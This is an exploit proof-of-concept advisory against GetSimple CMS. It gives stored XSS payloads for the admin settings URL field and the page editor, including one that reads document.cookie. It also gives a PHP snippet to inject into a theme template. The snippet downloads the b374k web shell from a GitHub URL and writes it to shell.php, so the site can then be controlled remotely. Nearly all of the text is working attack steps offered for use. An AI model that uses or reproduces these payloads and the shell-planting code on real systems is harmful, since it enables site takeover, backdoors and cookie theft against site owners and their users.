_                 _        _       _______ __________________ _______ 
( (    /||\     /|( \      ( \     (  ____ \\__   __/\__   __/(  ____ \
|  \  ( || )   ( || (      | (     | (    \/   ) (      ) (   | (    \/
|   \ | || |   | || |      | |     | (_____    | |      | |   | (__    
| (\ \) || |   | || |      | |     (_____  )   | |      | |   |  __)   
| | \   || |   | || |      | |           ) |   | |      | |   | (      
| )  \  || (___) || (____/\| (____/Y\____) |___) (___   | |   | (____/\
|/    )_)(_______)(_______/(_______|_______)\_______/   )_(   (_______/

#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => https://get-simple.info/
#Dork => ???
#CMS => GetSimple CMS (last version)
#Vulnz => XSS/File injection
#Date => 25/03/2023

*PoC*
_______________________________________________
1# http://www.site.com/cms/admin/settings.php  |
_______________________________________________|______________ _____________________ ________________________________ _________
inside input text *WebSite URL:* try "http://www.site.com/cms/'>">\></a><script>alert(document.cookie)</script>"  <= [*XSS*]   |
-------------------------------------------------------------------------------------------------------------------------------|

_______________________________________________________________________________
2# http://www.site.com/cms/admin/edit.php?id=index&upd=edit-success&type=edit  |*XSS*
_______________________________________________________________________________|_______
inside  the *editor textarea* write "123" and later click on "source"                  |
now result: <p>123</p>                                                                 |
you add this *<script>alert("xss")</script>*                                           |
complete string: <p>123</p><script>alert("xss")</script>   <= (all need manually)      |
---------------------------------------------------------------------------------------


----------------------------
#3 External File injection  |:
____________________________
-Go to *http://www.site.com/cms/admin/theme-edit.php?t=Innovation&f=template.php*
-Edit the template file with editor
- inject this code above the page:

[code]
<?
$shellz = file_get_contents('https://raw.githubusercontent.com/NSAKEY/Top-103-shells/master/Top%20103%20shells/b374k-mini-shell-php.php.txt');
$yes = "shell.php";
$fp = fopen($yes,"a");
fputs ($fp," $shellz ");
fclose($fp);
?>
[/code]
- save the changes and go to address *http://www.site.come/cms/theme/Innovation/template.php*
- now the shell was injected , go to address *http://www.site.com/cms/theme/Innovation/shell.php*
-----------------------------------------------------------------------------------------------------
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*